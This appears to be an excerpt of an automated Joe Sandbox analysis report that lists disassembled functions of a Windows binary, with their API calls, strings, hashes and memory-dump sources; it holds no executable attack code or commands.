Instruction ID: e6df29c81ba19ee61fc2248a38bf4daf5c5652aaae315cc1661bcc20605cacb5
Opcode Fuzzy Hash: 6292b0167846a3742d6cf35d5253bbf5de893562c4a9f4487a40c81f6ec06b34
Instruction Fuzzy Hash: 05E192715083509FDB24EF28D881B6AB7E4BFC5314F04896DF8899B2A2DB31DD45CB92

Function 00996ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00996F21
CoInitialize.OLE32(00000000), ref: 0099707E
CoCreateInstance.OLE32(009C0CC4,00000000,00000001,009C0B34,?), ref: 00997095
CoUninitialize.OLE32 ref: 00997319

Strings

.lnk, xrefs: 00996EFF, 00996F69, 00997025

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 9a24b367f7db03c9d2a79977a63439e52b4fda9f13cc63913b4a474fba6b5139
Instruction ID: a0c553f4430c0d3287e9ac7ccd908976f2d451f6d25cfdb300e55dd6874e99c5
Opcode Fuzzy Hash: 9a24b367f7db03c9d2a79977a63439e52b4fda9f13cc63913b4a474fba6b5139
Instruction Fuzzy Hash: 78D14671508211AFD700EF68D881E6BB7E8EFD8708F40496DF5858B2A2DB71ED45CB92

Function 00921B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

BeginPaint.USER32(?,?,?), ref: 00921B35
GetWindowRect.USER32(?,?), ref: 00921B99
ScreenToClient.USER32(?,?), ref: 00921BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00921BC7
EndPaint.USER32(?,?,?,?,?), ref: 00921C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00963287

Part of subcall function 00921C2D: BeginPath.GDI32(00000000), ref: 00921C4B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 66dfd7bd04c8b8309bc65042df73c3d35106b77e2c9187a71378b4c6c81e4682
Instruction ID: 5015bcc20674d5bcb174e3765a9f99a84efa830e5e977ccea349b0103862c6b8
Opcode Fuzzy Hash: 66dfd7bd04c8b8309bc65042df73c3d35106b77e2c9187a71378b4c6c81e4682
Instruction Fuzzy Hash: AD41DE70109310AFD710DF28ED84FB67BA8EB55330F100669FAA48B2B5D7709944EB62

Function 00991196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009911B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009911EE
EnterCriticalSection.KERNEL32(?), ref: 0099120A
LeaveCriticalSection.KERNEL32(?), ref: 00991283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0099129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 009912C8

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: abe359f5ccc7e0ec36610ae4ecb6a7875314e30c590952e505c86724339e6447
Instruction ID: 6ead5b2c9e5f5596f8a4c7d8e6302f26cfd0e27c08fe971de66b4ae5637fb302
Opcode Fuzzy Hash: abe359f5ccc7e0ec36610ae4ecb6a7875314e30c590952e505c86724339e6447
Instruction Fuzzy Hash: 44415A71914205EFDF04AF58DC85AAAB7B8FF88310F1440A5EE009B296DB30DE51DBA0

Function 009B8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0097FBEF,00000000,?,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 009B8CA7
EnableWindow.USER32(?,00000000), ref: 009B8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009B8D2C
ShowWindow.USER32(?,00000004), ref: 009B8D40
EnableWindow.USER32(?,00000001), ref: 009B8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009B8D8A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 2046b885c4b2828121bec61fcfe29e5239c7156e9c1443347acce8c7ef863802
Instruction ID: 0f822a9b1d975c7cc99f9d7710f074b93af4f77cc8a80ceddae2e1b4ed726d09
Opcode Fuzzy Hash: 2046b885c4b2828121bec61fcfe29e5239c7156e9c1443347acce8c7ef863802
Instruction Fuzzy Hash: 0541F9B0606244AFDB25CF24CB89BE27FF8FB4D324F1401A9E5484B2B2CB716845DB50

Function 009A2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009A2D45

Part of subcall function 0099EF33: GetWindowRect.USER32(?,?), ref: 0099EF4B

GetDesktopWindow.USER32 ref: 009A2D6F
GetWindowRect.USER32(00000000), ref: 009A2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 009A2DB2
GetCursorPos.USER32(?), ref: 009A2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009A2E3C

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 0ae3dec1611d889d618a21f33f81d899ed77aad272b37f9e8f041354c8fe7ed7
Instruction ID: 629da89eb494f3b5558387c3535ee6af6416c5842d559dfeb08a4fd3ffdb029d
Opcode Fuzzy Hash: 0ae3dec1611d889d618a21f33f81d899ed77aad272b37f9e8f041354c8fe7ed7
Instruction Fuzzy Hash: 7031B07250A315ABD720DF18D849F9BB7A9FFC5364F000A1AF49597182DA70E909CBE2

Function 009855E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009855F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00985616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0098564E
_wcslen.LIBCMT ref: 0098566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00985674
_wcsstr.LIBVCRUNTIME ref: 0098567E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 7eff3e27faa4985a407df197615ed9012d9772e33f1470d4bff7e8aafb8d1bd6
Instruction ID: 2e205b7093e62aab046611abc97f6df5beb395774c2156fe4b008efdcee64a30
Opcode Fuzzy Hash: 7eff3e27faa4985a407df197615ed9012d9772e33f1470d4bff7e8aafb8d1bd6
Instruction Fuzzy Hash: 43210472208600BBEB166B24DC49F7F7BACDF88720F154069F905CA291FE75CC419760

Function 00996263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871

_wcslen.LIBCMT ref: 009962C0
CoInitialize.OLE32(00000000), ref: 009963DA
CoCreateInstance.OLE32(009C0CC4,00000000,00000001,009C0B34,?), ref: 009963F3
CoUninitialize.OLE32 ref: 00996411

Strings

.lnk, xrefs: 009962BB, 00996306, 009963CA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 5ffa07723edf3ae9768718ed3f3b2f0a2c545944ae6e5fb65adf74d51c61b7cd
Instruction ID: c612dab79470902e86591f5fc1c2079ac17a41a46001c43374b2805dce9488d7
Opcode Fuzzy Hash: 5ffa07723edf3ae9768718ed3f3b2f0a2c545944ae6e5fb65adf74d51c61b7cd
Instruction Fuzzy Hash: 5AD13375A082119FCB14DF28C484A2ABBF9FF89714F15895DF8899B361CB31EC45CB92

Function 009B86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 009B8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 009B8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009B877D
GetSystemMetrics.USER32(00000004), ref: 009B87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0099C1F2,00000000), ref: 009B87C6

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

GetSystemMetrics.USER32(00000004), ref: 009B87B1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 9a5e38b1febf55896e51dcad0b87ea1a78344d30b96c26b8017ba295f83e3bfb
Instruction ID: 0dad15e36acf4f48fadde5902b97d2f11a5adc351d285fa0611996bc78226aca
Opcode Fuzzy Hash: 9a5e38b1febf55896e51dcad0b87ea1a78344d30b96c26b8017ba295f83e3bfb
Instruction Fuzzy Hash: C82171716252459FCB145F38CE88AAB37ADEB49379F244729B926C21E0EE708850DB10

Function 009436F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009436E9,00943355), ref: 00943700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0094370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00943727
SetLastError.KERNEL32(00000000,?,009436E9,00943355), ref: 00943779

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: df89b1691e4e3622948a5e9895284c5c71e26960b59b17fa295472e54d499287
Instruction ID: d3dd2ea5b9dd322e378f34e236e5cdab3629fcae1544b191f80e533adc7b6b24
Opcode Fuzzy Hash: df89b1691e4e3622948a5e9895284c5c71e26960b59b17fa295472e54d499287
Instruction Fuzzy Hash: 17014CB256F3116EA62427B5BDC6F673AD8EB4A7767348339F150441F2EF114E01A240

Function 009530E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00944D53,00000000,?,?,009468E2,?,?,00000000), ref: 009530EB
_free.LIBCMT ref: 0095311E
_free.LIBCMT ref: 00953146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00953153
SetLastError.KERNEL32(00000000,?,00000000), ref: 0095315F
_abort.LIBCMT ref: 00953165

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 77a294396fd96b70eca82d11a4e8c12d527fee7a706227f9ca0ee29105521c8e
Instruction ID: e804b3caf1405fb3410eb068409041fbfd62c945a21c623a09e304dac30ea9d4
Opcode Fuzzy Hash: 77a294396fd96b70eca82d11a4e8c12d527fee7a706227f9ca0ee29105521c8e
Instruction Fuzzy Hash: 58F0F43650D90027C222E737AC06B6A236A9FC17B7F248518FD24D22D2FE248E0E5361

Function 009B9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00921F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00921F87
Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921F96
Part of subcall function 00921F2D: BeginPath.GDI32(?), ref: 00921FAD
Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 009B94AA
LineTo.GDI32(?,00000003,00000000), ref: 009B94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 009B94CC
LineTo.GDI32(?,00000000,00000003), ref: 009B94DC
EndPath.GDI32(?), ref: 009B94EC
StrokePath.GDI32(?), ref: 009B94FC

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 25f7d15b68fc97c053e598ead20f196ffe36a9dbc4f658e27b29d7fb366f2de1
Instruction ID: a0a358fa62d8bbf988c63897ab146210b5db0e26fb7dcb0f5a36443d8a628d3e
Opcode Fuzzy Hash: 25f7d15b68fc97c053e598ead20f196ffe36a9dbc4f658e27b29d7fb366f2de1
Instruction Fuzzy Hash: 8511097601510DBFDB129F90DD88FEA7F6DEB08360F048111FA194A161D7719D55EBA0

Function 00985B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00985B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00985B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00985B94
ReleaseDC.USER32(00000000,00000000), ref: 00985B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00985BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00985BC5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 23fe8ac9240b97ccb1dc6071d0d57aa7755bcfa2f60878369dad1af7fb7950dc
Instruction ID: fcb9e26e1011e089801301b8f3bc3a10e1b9d88ae6af30bc3833766f0ab8de2d
Opcode Fuzzy Hash: 23fe8ac9240b97ccb1dc6071d0d57aa7755bcfa2f60878369dad1af7fb7950dc
Instruction Fuzzy Hash: 8E018475E04308BBEB10AFA59D49F4E7F78EB44361F004065FA04A7280E6709C00DF90

Function 0092327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009232AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 009232B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009232C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009232CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 009232D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 009232DD

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 31fbe296fb97cf754df5964ef3c3073e88714b74080e511976556cd1ef2563bd
Instruction ID: 172524e792417dddbeba0c432545b6bb63eb753fc7fba288d297d1b1dc25e8b4
Opcode Fuzzy Hash: 31fbe296fb97cf754df5964ef3c3073e88714b74080e511976556cd1ef2563bd
Instruction Fuzzy Hash: 450167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 0098F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0098F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0098F45D
GetWindowThreadProcessId.USER32(?,?), ref: 0098F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0098F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0098F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0098F48C

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 7b0abb7abd42be6cc205cf55a6ddf878c596bb05737318fdff4d192001c92145
Instruction ID: cc06d7980a50060f0dcf62bc171d1d650e9eb29fb04e9bbec72411cddc22efba
Opcode Fuzzy Hash: 7b0abb7abd42be6cc205cf55a6ddf878c596bb05737318fdff4d192001c92145
Instruction Fuzzy Hash: 23F0903221A158BBE72457629D0EEEF3B7CEFC6B21F000158F60191090E7A01A01E6B5

Function 009634D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 009634EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00963506
GetWindowDC.USER32(?), ref: 00963512
GetPixel.GDI32(00000000,?,?), ref: 00963521
ReleaseDC.USER32(?,00000000), ref: 00963533
GetSysColor.USER32(00000005), ref: 0096354D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 47f2eb84ba44f01362e90d0d1c9d08a2f9063a002b694b986eedfefda78b68c5
Instruction ID: 32a4d3526b7161c30af7d6cf5b48647ad51e5c6236eae1aa73b164d446df1d12
Opcode Fuzzy Hash: 47f2eb84ba44f01362e90d0d1c9d08a2f9063a002b694b986eedfefda78b68c5
Instruction Fuzzy Hash: BE014631519215EFDB605FA4DD08FEA7BB5FF08321F504664FA1AA21A1DB311E51EF10

Function 009821C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009821CC
UnloadUserProfile.USERENV(?,?), ref: 009821D8
CloseHandle.KERNEL32(?), ref: 009821E1
CloseHandle.KERNEL32(?), ref: 009821E9
GetProcessHeap.KERNEL32(00000000,?), ref: 009821F2
HeapFree.KERNEL32(00000000), ref: 009821F9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: dd7adac17fa79a4f7e9a479061c8e602e4ecdc37411517e3065c280979febda7
Instruction ID: 8d72359bfed7366f7d6c4bd8614ce06ca6327bf795ec139802660d937a586c85
Opcode Fuzzy Hash: dd7adac17fa79a4f7e9a479061c8e602e4ecdc37411517e3065c280979febda7
Instruction Fuzzy Hash: FBE0E5B601D105BBDB051FA5EE0C94ABF79FF49332B104320F22582070EB329420EB50

Function 0098CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0098CF99
